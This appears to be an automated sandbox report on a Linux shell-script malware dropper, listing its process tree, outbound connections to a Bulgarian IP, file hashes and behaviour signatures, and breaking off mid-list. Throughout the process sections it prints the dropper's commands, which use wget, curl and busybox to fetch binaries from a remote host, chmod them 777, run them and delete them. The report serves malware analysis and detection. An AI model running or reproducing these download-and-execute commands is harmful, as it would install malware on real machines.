[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/chmod

[chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff

[./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/rm

[rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/chmod

[chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff

[./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/rm

[rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

[rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/wget

[wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/chmod

[chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

[./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/rm

[rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:23

Reported

2024-11-21 08:25

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

131s

Command Line

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A

Processes

/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

